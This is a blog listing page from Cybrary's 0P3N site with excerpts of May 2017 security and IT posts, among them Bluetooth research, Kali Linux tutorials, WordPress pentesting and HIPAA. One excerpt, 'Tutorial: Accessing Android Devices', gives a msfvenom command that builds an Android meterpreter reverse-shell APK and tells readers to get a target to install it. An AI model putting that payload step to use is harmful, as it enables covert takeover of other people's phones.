0P3N Blog

Cybrary’s Open Blog is a user contributed cybersecurity knowledge base that brings together content highlighting the latest tools, exploits, technologies and insights in the industry.

Ubertooth One
By: bachan
May 4, 2017

Bluetooth is a very useful and attracting technology and The Ubertooth One is an open source and widely available Bluetooth testing and research tool. Every Bluetooth device has a 48-bit unique Bluetooth device address, as it's mac address, which consists of 3 sections. Non-significant address part (NSP), upper address part (UAP) and lower address part (LAP). In order to connect to a ...

4. Ethical Hacking with Kali Linux – Updates and GEDIT
By: Priyank Gada
May 4, 2017

In this chapter, we are going to install updates and upgrade our kali Linux install. We will also install Gedit. We will also learn some basic commands for installing, updating and upgrading packages in Linux. What is Gedit? Gedit is a graphical user interface text editor. We are going to use this editor in our course. GEDIT is simple ...

Reading and Outputting from a File in Juliar
By: Rattar
May 3, 2017

This tutorial assumes you have the latest version of Juliar downloaded on your computer. If not, please see previous tutorials. Hello Cybrarians and RatTeamsters,In today's tutorial, we will be learning how to quickly grab contents of the file and output it onto the screen.Here are the commands we will be using: __getByteFromString ...

3. Ethical Hacking with Kali Linux - Kali Linux
By: Priyank Gada
May 2, 2017

What is Kali Linux? Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing . Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, etc Should I ...

Remembering a Part of InfoSec History: Rebecca Bace Memorial
By: Olivia
May 2, 2017

There are many past events and people who have attributed to the field of Information Security, and as Cybrary begins to explore some of the key players and happenings that got the industry to where it is today, we felt it important to remember one significant contributor, Rebecca ‘Becky’ Bace.Becky Bace has had a significant impact of the security ...

Tutorial: Accessing Android Devices
By: Stryker
May 2, 2017

Android smartphones (Hack)/(Takeover) 19Create a payload by typing the information below. Number 1, should be saved in your home folder.1. msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=8888 R> Manjohn.apk The manjohn.apk file you send to your target, get them to install it.This will create the payload called program.apk (or whatever you name it), where you see the IP and port you need ...

The Emergence of Hacking
May 2, 2017

Hacking began in the 1960s at MIT when students attempted to learn more about mainframe computing systems and improve their skills.The telephone systems were tempting to phreakers, and John Draper, known as Captain Crunch, used a whistle packaged in Captain Crunch cereal to generate a 2600 Hertz tone that allowed access to AT&T long distance network. This discovery led ...

How to do Penetration Testing with your WordPress Website
By: gurubaran
May 1, 2017

WordPress is a free online Open source content Managed system focused on PHP and MySQL. It is one the powerful and most used blogging tool.As there is too many up’s and down’s in WordPress usage, it requires a security improvement, so the penetration test is essential to find the vulnerabilities and to secure you WordPress powered blog.Security researcher Daniel ...

Necessity of HIPAA Compliance Services
By: ankitashukla
May 1, 2017

Our act of HIPAA was passed into law in 1996, whose purpose was to create a national standard for giving due protection to the privacy of personal health information. The law has been intended to provide shelter to health information by simply establishing transaction standards. Those standards have been set for the exchange of health ...

Budgeting Analysis
By: themindandbeauty
April 30, 2017

It is the budgeting which represents these resources providing investments and these investments consumed within organizations. It includes two ways; obtaining investments and using them. It is the budgeting which includes the destination of avenues and expenses. It represents two values; the plans and objectives. Budgeting standard; converting objectives to numbers. Budgeting content; the destination ...